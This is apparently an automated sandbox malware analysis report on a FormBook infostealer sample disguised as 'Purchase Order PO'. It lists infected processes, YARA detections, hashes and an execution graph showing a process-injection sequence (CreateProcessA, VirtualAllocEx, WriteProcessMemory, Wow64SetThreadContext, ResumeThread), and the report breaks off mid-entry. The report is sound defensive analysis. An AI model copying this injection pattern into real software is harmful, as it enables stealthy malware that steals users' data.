                                                            Path:C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe"
                                                            Imagebase:0x240000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3284154909.0000000003170000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:6
                                                            Start time:09:32:29
                                                            Start date:27/11/2024
                                                            Path:C:\Windows\SysWOW64\isoburn.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\isoburn.exe"
                                                            Imagebase:0x410000
                                                            File size:107'008 bytes
                                                            MD5 hash:BF19DD525C7D23CAFC086E9CCB9C06C6
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3284014687.0000000003480000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3284352554.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false

                                                            General

                                                            Target ID:8
                                                            Start time:09:32:42
                                                            Start date:27/11/2024
                                                            Path:C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe"
                                                            Imagebase:0x240000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3286346914.0000000005710000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:9
                                                            Start time:09:32:54
                                                            Start date:27/11/2024
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff79f9e0000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:10.4%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:4.2%
                                                              Total number of Nodes:166
                                                              Total number of Limit Nodes:9
                                                              execution_graph 41473 2bfd01c 41474 2bfd034 41473->41474 41475 2bfd08e 41474->41475 41480 2f71b77 41474->41480 41485 2f71b88 41474->41485 41490 2f728f8 41474->41490 41495 2f728e9 41474->41495 41481 2f71bae 41480->41481 41483 2f728e9 2 API calls 41481->41483 41484 2f728f8 2 API calls 41481->41484 41482 2f71bcf 41482->41475 41483->41482 41484->41482 41486 2f71bae 41485->41486 41488 2f728e9 2 API calls 41486->41488 41489 2f728f8 2 API calls 41486->41489 41487 2f71bcf 41487->41475 41488->41487 41489->41487 41491 2f72925 41490->41491 41492 2f72957 41491->41492 41500 2f72a80 41491->41500 41505 2f72a70 41491->41505 41492->41492 41496 2f72925 41495->41496 41497 2f72957 41496->41497 41498 2f72a80 2 API calls 41496->41498 41499 2f72a70 2 API calls 41496->41499 41498->41497 41499->41497 41501 2f72a94 41500->41501 41510 2f72b28 41501->41510 41513 2f72b38 41501->41513 41502 2f72b20 41502->41492 41507 2f72a94 41505->41507 41506 2f72b20 41506->41492 41508 2f72b38 2 API calls 41507->41508 41509 2f72b28 2 API calls 41507->41509 41508->41506 41509->41506 41511 2f72b49 41510->41511 41516 2f740f2 41510->41516 41511->41502 41514 2f72b49 41513->41514 41515 2f740f2 2 API calls 41513->41515 41514->41502 41515->41514 41520 2f74120 41516->41520 41524 2f74110 41516->41524 41517 2f7410a 41517->41511 41521 2f74162 41520->41521 41523 2f74169 41520->41523 41522 2f741ba CallWindowProcW 41521->41522 41521->41523 41522->41523 41523->41517 41525 2f74120 41524->41525 41526 2f741ba CallWindowProcW 41525->41526 41527 2f74169 41525->41527 41526->41527 41527->41517 41528 764e900 41529 764e945 Wow64SetThreadContext 41528->41529 41531 764e98d 41529->41531 41393 2d8add0 41396 2d8aeb7 41393->41396 41394 2d8addf 41397 2d8aefc 41396->41397 41398 2d8aed9 41396->41398 41397->41394 41398->41397 41399 2d8b100 GetModuleHandleW 41398->41399 41400 2d8b12d 41399->41400 41400->41394 41532 2d8d7b0 DuplicateHandle 41533 2d8d846 41532->41533 41534 764f308 41535 764f350 WriteProcessMemory 41534->41535 41537 764f3a7 41535->41537 41538 764f248 41539 764f288 VirtualAllocEx 41538->41539 41541 764f2c5 41539->41541 41542 2d84668 41543 2d8467a 41542->41543 41544 2d84686 41543->41544 41548 2d84779 41543->41548 41553 2d84210 41544->41553 41546 2d846a5 41549 2d8479d 41548->41549 41557 2d84879 41549->41557 41561 2d84888 41549->41561 41554 2d8421b 41553->41554 41569 2d85c54 41554->41569 41556 2d86ff6 41556->41546 41559 2d848af 41557->41559 41558 2d8498c 41558->41558 41559->41558 41565 2d844d4 41559->41565 41562 2d848af 41561->41562 41563 2d844d4 CreateActCtxA 41562->41563 41564 2d8498c 41562->41564 41563->41564 41566 2d85918 CreateActCtxA 41565->41566 41568 2d859db 41566->41568 41570 2d85c5f 41569->41570 41573 2d85c74 41570->41573 41572 2d87205 41572->41556 41574 2d85c7f 41573->41574 41577 2d85ca4 41574->41577 41576 2d872e2 41576->41572 41578 2d85caf 41577->41578 41579 2d85cd4 2 API calls 41578->41579 41580 2d873e5 41579->41580 41580->41576 41581 2d8d568 41582 2d8d5ae GetCurrentProcess 41581->41582 41584 2d8d5f9 41582->41584 41585 2d8d600 GetCurrentThread 41582->41585 41584->41585 41586 2d8d63d GetCurrentProcess 41585->41586 41587 2d8d636 41585->41587 41588 2d8d673 41586->41588 41587->41586 41589 2d8d69b GetCurrentThreadId 41588->41589 41590 2d8d6cc 41589->41590 41591 764f590 41592 764f593 CreateProcessA 41591->41592 41594 764f7db 41592->41594 41595 764e850 41596 764e890 ResumeThread 41595->41596 41598 764e8c1 41596->41598 41599 2f7f500 41600 2f7f510 41599->41600 41601 2f7db0c 2 API calls 41600->41601 41602 2f7f515 41601->41602 41401 764f3f8 41402 764f443 ReadProcessMemory 41401->41402 41404 764f487 41402->41404 41405 2f786e8 41406 2f78715 41405->41406 41409 2f7838c 41406->41409 41408 2f78736 41410 2f78397 41409->41410 41415 2f7a428 41410->41415 41414 2f7a92d 41414->41408 41416 2f7a433 41415->41416 41423 2f7db0c 41416->41423 41418 2f7a90c 41419 2f7a438 41418->41419 41420 2f7a443 41419->41420 41421 2f7db0c 2 API calls 41420->41421 41422 2f7fd95 41421->41422 41422->41414 41424 2f7db17 41423->41424 41425 2f7f556 41424->41425 41428 2d88429 41424->41428 41432 2d85cd4 41424->41432 41425->41418 41430 2d88463 41428->41430 41429 2d88729 41429->41425 41430->41429 41436 2d8ce88 41430->41436 41434 2d85cdf 41432->41434 41433 2d88729 41433->41425 41434->41433 41435 2d8ce88 2 API calls 41434->41435 41435->41433 41437 2d8ceb9 41436->41437 41438 2d8cedd 41437->41438 41441 2d8d039 41437->41441 41445 2d8d048 41437->41445 41438->41429 41442 2d8d055 41441->41442 41444 2d8d08f 41442->41444 41449 2d8bc20 41442->41449 41444->41438 41446 2d8d055 41445->41446 41447 2d8d08f 41446->41447 41448 2d8bc20 2 API calls 41446->41448 41447->41438 41448->41447 41450 2d8bc2b 41449->41450 41452 2d8dda8 41450->41452 41453 2d8d244 41450->41453 41452->41452 41454 2d8d24f 41453->41454 41455 2d85cd4 2 API calls 41454->41455 41456 2d8de17 41455->41456 41459 2d8fba8 41456->41459 41457 2d8de51 41457->41452 41461 2d8fbd9 41459->41461 41462 2d8fcd9 41459->41462 41460 2d8fbe5 41460->41457 41461->41460 41465 2f70ab0 41461->41465 41469 2f70aaa 41461->41469 41462->41457 41466 2f70adb 41465->41466 41467 2f70b8a 41466->41467 41468 2f71870 CreateWindowExW CreateWindowExW 41466->41468 41468->41467 41470 2f70adb 41469->41470 41471 2f70b8a 41470->41471 41472 2f71870 CreateWindowExW CreateWindowExW 41470->41472 41472->41471

                                                              Executed Functions

                                                              Function 07640040 Relevance: 8.5, Strings: 6, Instructions: 1022COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 294 7640040-7640061 295 7640063 294->295 296 7640068-7640154 294->296 295->296 298 764097c-76409a4 296->298 299 764015a-76402ab 296->299 302 7641081-764108a 298->302 343 76402b1-764030c 299->343 344 764094a-7640979 299->344 303 7641090-76410a7 302->303 304 76409b2-76409bb 302->304 306 76409c2-7640ab6 304->306 307 76409bd 304->307 325 7640ae0 306->325 326 7640ab8-7640ac4 306->326 307->306 330 7640ae6-7640b06 325->330 328 7640ac6-7640acc 326->328 329 7640ace-7640ad4 326->329 331 7640ade 328->331 329->331 335 7640b66-7640bdc 330->335 336 7640b08-7640b61 330->336 331->330 355 7640c31-7640c74 335->355 356 7640bde-7640c2f 335->356 348 764107e 336->348 350 7640311-764031c 343->350 351 764030e 343->351 344->298 348->302 354 7640860-7640866 350->354 351->350 357 7640321-764033f 354->357 358 764086c-76408e9 354->358 384 7640c7f-7640c85 355->384 356->384 361 7640396-76403ab 357->361 362 7640341-7640345 357->362 401 7640936-764093c 358->401 364 76403b2-76403c8 361->364 365 76403ad 361->365 362->361 367 7640347-7640352 362->367 369 76403cf-76403e6 364->369 370 76403ca 364->370 365->364 371 7640388-764038e 367->371 375 76403ed-7640403 369->375 376 76403e8 369->376 370->369 373 7640354-7640358 371->373 374 7640390-7640391 371->374 380 764035e-7640376 373->380 381 764035a 373->381 378 7640414-7640485 374->378 382 7640405 375->382 383 764040a-7640411 375->383 376->375 385 7640487 378->385 386 764049b-7640613 378->386 388 764037d-7640385 380->388 389 7640378 380->389 381->380 382->383 383->378 390 7640cdc-7640ce8 384->390 385->386 391 7640489-7640495 385->391 398 7640615 386->398 399 7640629-7640764 386->399 388->371 389->388 392 7640c87-7640ca9 390->392 393 7640cea-7640d72 390->393 391->386 396 7640cb0-7640cd9 392->396 397 7640cab 392->397 423 7640ef3-7640efc 393->423 396->390 397->396 398->399 403 7640617-7640623 398->403 413 7640766-764076a 399->413 414 76407c8-76407dd 399->414 404 764093e 401->404 405 76408eb-7640933 401->405 403->399 404->344 405->401 413->414 417 764076c-764077b 413->417 415 76407e4-7640805 414->415 416 76407df 414->416 420 7640807 415->420 421 764080c-764082b 415->421 416->415 422 76407ba-76407c0 417->422 420->421 428 7640832-7640852 421->428 429 764082d 421->429 424 76407c2-76407c3 422->424 425 764077d-7640781 422->425 426 7640d77-7640d8c 423->426 427 7640f02-7640f5d 423->427 434 764085d 424->434 435 7640783-7640787 425->435 436 764078b-76407ac 425->436 430 7640d95-7640ee1 426->430 431 7640d8e 426->431 451 7640f94-7640fbe 427->451 452 7640f5f-7640f92 427->452 432 7640854 428->432 433 7640859 428->433 429->428 456 7640eed 430->456 431->430 437 7640e23-7640e63 431->437 438 7640dde-7640e1e 431->438 439 7640e68-7640ea8 431->439 440 7640d9b-7640dd9 431->440 432->433 433->434 434->354 435->436 441 76407b3-76407b7 436->441 442 76407ae 436->442 437->456 438->456 439->456 440->456 441->422 442->441 460 7640fc7-7641058 451->460 452->460 456->423 464 764105f-7641077 460->464 464->348
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2073170163.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7640000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q$<ov!$TJbq$Te]q$paq$xb`q
                                                              • API String ID: 0-1186416546
                                                              • Opcode ID: d6f885cd876945d0b35a42ed54de48e44ce601785396cc8dd340c95ba95cd2d8
                                                              • Instruction ID: 1a57f009abf81655c5d48e180a6f53d6b30c448b933e6d64084dc6add0399d5f
                                                              • Opcode Fuzzy Hash: d6f885cd876945d0b35a42ed54de48e44ce601785396cc8dd340c95ba95cd2d8
                                                              • Instruction Fuzzy Hash: 61B2D075E00629CFDB65CF69C984AD9BBB2FF89300F1581E9D509AB225DB319E81CF40
                                                              Function 02F7838C Relevance: .6, Instructions: 592COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069867675.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2f70000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4782a7d75e05e68b2c443d4a73cfa7334435e55717f25eb4c29c63f0f81dbb98
                                                              • Instruction ID: 6c0c7e3e4af699d8ac4cf9e5d9665dc5c7fb5c33e38607e7febaa9bf38f775f7
                                                              • Opcode Fuzzy Hash: 4782a7d75e05e68b2c443d4a73cfa7334435e55717f25eb4c29c63f0f81dbb98
                                                              • Instruction Fuzzy Hash: A3525A34A003168FCB14DF28C944B99B7B2FF89314F2586A9D5586F3A1DB71AD86CF81
                                                              Function 02F7A860 Relevance: .6, Instructions: 576COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069867675.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2f70000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dff6b17170ada8c472ae6a480a3c03c3ec4a74524757d78f8b83d296cc211ec7
                                                              • Instruction ID: 2a779cfd2559573c4a97ffb7a69a92cdbca92fcda2c487e6ab5ca6c6df1193b8
                                                              • Opcode Fuzzy Hash: dff6b17170ada8c472ae6a480a3c03c3ec4a74524757d78f8b83d296cc211ec7
                                                              • Instruction Fuzzy Hash: D9525A34A003568FCB14DF28C944B99B7B2FF89314F2586A9D5586F3A1DB71AD86CF80
                                                              Function 07644000 Relevance: .2, Instructions: 198COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2073170163.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7640000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9b3f149069b03a838edb43945794986ee62c219824dbb2cb03b42688883d9f8f
                                                              • Instruction ID: e244cdd0a9efa03fb5ccb275017dc705a7d4f29df398548a15567db1ee751003
                                                              • Opcode Fuzzy Hash: 9b3f149069b03a838edb43945794986ee62c219824dbb2cb03b42688883d9f8f
                                                              • Instruction Fuzzy Hash: 127115B0D15219CFDB14DFA9D5856EEBFB6FF8A300F20A02AD40AA7215DB345946CF40
                                                              Function 02D86F92 Relevance: .1, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069510541.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2d80000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6e2849ccd3cc715780e4447b50be8e63c1524f4000e24062e723d0329e2fbf1d
                                                              • Instruction ID: 3f100463e68e2cf514fa7bea4d33b4e3d13b3c12add7409869cc1f4da26d2c86
                                                              • Opcode Fuzzy Hash: 6e2849ccd3cc715780e4447b50be8e63c1524f4000e24062e723d0329e2fbf1d
                                                              • Instruction Fuzzy Hash: 6251A570E012189FDB09DFA9D994AEEBBB2FF88300F148429D409AB364DB355D46CF90
                                                              Function 02D84210 Relevance: .1, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069510541.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2d80000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b1f0cd89b631ceaf5ad88c0339058bcb929e645cb9203ed493f7c2bd09a95ef6
                                                              • Instruction ID: eb97050ef2b0f71bb19548e0b219dab8e0b447b75df73ccb40d5e0164b97f0ae
                                                              • Opcode Fuzzy Hash: b1f0cd89b631ceaf5ad88c0339058bcb929e645cb9203ed493f7c2bd09a95ef6
                                                              • Instruction Fuzzy Hash: 9551B570E012189FDB09DFA9D994AEEBBB2FF88300F148429D509AB364DB359D45CF90
                                                              Function 076494D1 Relevance: .1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2073170163.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7640000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 31c73236dbdce2b1004925b4f3df30d07a75301fe456c4e37454d08eacd189df
                                                              • Instruction ID: aa03603d9839ae43610a778734ed72401006eae7351ac73667f909932d9fdbf6
                                                              • Opcode Fuzzy Hash: 31c73236dbdce2b1004925b4f3df30d07a75301fe456c4e37454d08eacd189df
                                                              • Instruction Fuzzy Hash: 0821E7B1D056189BEB18CFABC8553DEFFF6AFC9300F14C06AD409A6254DB7419468F90
                                                              Function 02D8D559 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 465 2d8d559-2d8d5f7 GetCurrentProcess 469 2d8d5f9-2d8d5ff 465->469 470 2d8d600-2d8d634 GetCurrentThread 465->470 469->470 471 2d8d63d-2d8d671 GetCurrentProcess 470->471 472 2d8d636-2d8d63c 470->472 473 2d8d67a-2d8d695 call 2d8d737 471->473 474 2d8d673-2d8d679 471->474 472->471 478 2d8d69b-2d8d6ca GetCurrentThreadId 473->478 474->473 479 2d8d6cc-2d8d6d2 478->479 480 2d8d6d3-2d8d735 478->480 479->480
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 02D8D5E6
                                                              • GetCurrentThread.KERNEL32 ref: 02D8D623
                                                              • GetCurrentProcess.KERNEL32 ref: 02D8D660
                                                              • GetCurrentThreadId.KERNEL32 ref: 02D8D6B9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069510541.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2d80000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: b480a6be63c2d85bc2e030a4896a8fbe543a85ee26ef3118e8bf0ed4369be93d
                                                              • Instruction ID: 6ad27e8af62c23b8664002b3737489c06e18b4f679f1b1f5fce22fd671c9eb5f
                                                              • Opcode Fuzzy Hash: b480a6be63c2d85bc2e030a4896a8fbe543a85ee26ef3118e8bf0ed4369be93d
                                                              • Instruction Fuzzy Hash: F95147B09003498FDB14DFA9D588BAEBBF2FF89304F248459D419A73A0D7789944CF65
                                                              Function 02D8D568 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 487 2d8d568-2d8d5f7 GetCurrentProcess 491 2d8d5f9-2d8d5ff 487->491 492 2d8d600-2d8d634 GetCurrentThread 487->492 491->492 493 2d8d63d-2d8d671 GetCurrentProcess 492->493 494 2d8d636-2d8d63c 492->494 495 2d8d67a-2d8d695 call 2d8d737 493->495 496 2d8d673-2d8d679 493->496 494->493 500 2d8d69b-2d8d6ca GetCurrentThreadId 495->500 496->495 501 2d8d6cc-2d8d6d2 500->501 502 2d8d6d3-2d8d735 500->502 501->502
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 02D8D5E6
                                                              • GetCurrentThread.KERNEL32 ref: 02D8D623
                                                              • GetCurrentProcess.KERNEL32 ref: 02D8D660
                                                              • GetCurrentThreadId.KERNEL32 ref: 02D8D6B9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069510541.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2d80000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: b97dff8f7df0ba1b142f56fb8263c52ca21f54341a5b883a02a298d760a49cd0
                                                              • Instruction ID: 7f62a13f228b89c31a904d15622b1bd2331cb5700a14999866f5028d3cea4da7
                                                              • Opcode Fuzzy Hash: b97dff8f7df0ba1b142f56fb8263c52ca21f54341a5b883a02a298d760a49cd0
                                                              • Instruction Fuzzy Hash: FF5158B09003498FDB14DFAAD548BAEBBF5FF88304F208459D019A73A0D7749944CF65
                                                              Function 0764F584 Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 531 764f584-764f58a 532 764f593-764f625 531->532 533 764f58c-764f591 531->533 536 764f627-764f631 532->536 537 764f65e-764f67e 532->537 533->532 536->537 538 764f633-764f635 536->538 544 764f6b7-764f6e6 537->544 545 764f680-764f68a 537->545 539 764f637-764f641 538->539 540 764f658-764f65b 538->540 542 764f645-764f654 539->542 543 764f643 539->543 540->537 542->542 546 764f656 542->546 543->542 551 764f71f-764f7d9 CreateProcessA 544->551 552 764f6e8-764f6f2 544->552 545->544 547 764f68c-764f68e 545->547 546->540 549 764f690-764f69a 547->549 550 764f6b1-764f6b4 547->550 553 764f69c 549->553 554 764f69e-764f6ad 549->554 550->544 565 764f7e2-764f868 551->565 566 764f7db-764f7e1 551->566 552->551 555 764f6f4-764f6f6 552->555 553->554 554->554 556 764f6af 554->556 557 764f6f8-764f702 555->557 558 764f719-764f71c 555->558 556->550 560 764f704 557->560 561 764f706-764f715 557->561 558->551 560->561 561->561 562 764f717 561->562 562->558 576 764f878-764f87c 565->576 577 764f86a-764f86e 565->577 566->565 579 764f88c-764f890 576->579 580 764f87e-764f882 576->580 577->576 578 764f870 577->578 578->576 582 764f8a0-764f8a4 579->582 583 764f892-764f896 579->583 580->579 581 764f884 580->581 581->579 584 764f8b6-764f8bd 582->584 585 764f8a6-764f8ac 582->585 583->582 586 764f898 583->586 587 764f8d4 584->587 588 764f8bf-764f8ce 584->588 585->584 586->582 590 764f8d5 587->590 588->587 590->590
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0764F7C6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2073170163.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7640000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 141a92bbcbca6c93b3c0285a3b2b2189d6c29b058b19063fbd4d554bccd39550
                                                              • Instruction ID: 0887c8f589f73302d2dd44cfadb1616b596207e907ab84a1194e3c79c29802dd
                                                              • Opcode Fuzzy Hash: 141a92bbcbca6c93b3c0285a3b2b2189d6c29b058b19063fbd4d554bccd39550
                                                              • Instruction Fuzzy Hash: D6A169B1D0021ADFDB24DF68C850BEDBBB2BF48314F18856AE809B7250DB759985CF91
                                                              Function 0764F590 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 591 764f590-764f625 594 764f627-764f631 591->594 595 764f65e-764f67e 591->595 594->595 596 764f633-764f635 594->596 602 764f6b7-764f6e6 595->602 603 764f680-764f68a 595->603 597 764f637-764f641 596->597 598 764f658-764f65b 596->598 600 764f645-764f654 597->600 601 764f643 597->601 598->595 600->600 604 764f656 600->604 601->600 609 764f71f-764f7d9 CreateProcessA 602->609 610 764f6e8-764f6f2 602->610 603->602 605 764f68c-764f68e 603->605 604->598 607 764f690-764f69a 605->607 608 764f6b1-764f6b4 605->608 611 764f69c 607->611 612 764f69e-764f6ad 607->612 608->602 623 764f7e2-764f868 609->623 624 764f7db-764f7e1 609->624 610->609 613 764f6f4-764f6f6 610->613 611->612 612->612 614 764f6af 612->614 615 764f6f8-764f702 613->615 616 764f719-764f71c 613->616 614->608 618 764f704 615->618 619 764f706-764f715 615->619 616->609 618->619 619->619 620 764f717 619->620 620->616 634 764f878-764f87c 623->634 635 764f86a-764f86e 623->635 624->623 637 764f88c-764f890 634->637 638 764f87e-764f882 634->638 635->634 636 764f870 635->636 636->634 640 764f8a0-764f8a4 637->640 641 764f892-764f896 637->641 638->637 639 764f884 638->639 639->637 642 764f8b6-764f8bd 640->642 643 764f8a6-764f8ac 640->643 641->640 644 764f898 641->644 645 764f8d4 642->645 646 764f8bf-764f8ce 642->646 643->642 644->640 648 764f8d5 645->648 646->645 648->648
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0764F7C6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2073170163.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7640000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: ab02ea78a2e636ba7cf66e55738d417bc9370512a7644c976f96e66f0485f0fd
                                                              • Instruction ID: b68d2835aa78543ff0dab35ee753c42cec4f5026d22bcfff39a318dd07c11754
                                                              • Opcode Fuzzy Hash: ab02ea78a2e636ba7cf66e55738d417bc9370512a7644c976f96e66f0485f0fd
                                                              • Instruction Fuzzy Hash: 689149B1D0021ADFDB24DF68C840BEDBBB2BF48314F18856AE809B7250DB759985CF91
                                                              Function 02D8AEB7 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 649 2d8aeb7-2d8aed7 650 2d8aed9-2d8aee6 call 2d89840 649->650 651 2d8af03-2d8af07 649->651 656 2d8aee8 650->656 657 2d8aefc 650->657 652 2d8af09-2d8af13 651->652 653 2d8af1b-2d8af5c 651->653 652->653 660 2d8af69-2d8af77 653->660 661 2d8af5e-2d8af66 653->661 704 2d8aeee call 2d8b150 656->704 705 2d8aeee call 2d8b160 656->705 657->651 663 2d8af79-2d8af7e 660->663 664 2d8af9b-2d8af9d 660->664 661->660 662 2d8aef4-2d8aef6 662->657 667 2d8b038-2d8b0f8 662->667 665 2d8af89 663->665 666 2d8af80-2d8af87 call 2d8a210 663->666 668 2d8afa0-2d8afa7 664->668 670 2d8af8b-2d8af99 665->670 666->670 699 2d8b0fa-2d8b0fd 667->699 700 2d8b100-2d8b12b GetModuleHandleW 667->700 671 2d8afa9-2d8afb1 668->671 672 2d8afb4-2d8afbb 668->672 670->668 671->672 674 2d8afc8-2d8afd1 call 2d8a220 672->674 675 2d8afbd-2d8afc5 672->675 680 2d8afde-2d8afe3 674->680 681 2d8afd3-2d8afdb 674->681 675->674 683 2d8b001-2d8b00e 680->683 684 2d8afe5-2d8afec 680->684 681->680 690 2d8b010-2d8b02e 683->690 691 2d8b031-2d8b037 683->691 684->683 685 2d8afee-2d8affe call 2d8a230 call 2d8a240 684->685 685->683 690->691 699->700 701 2d8b12d-2d8b133 700->701 702 2d8b134-2d8b148 700->702 701->702 704->662 705->662
                                                              APIs
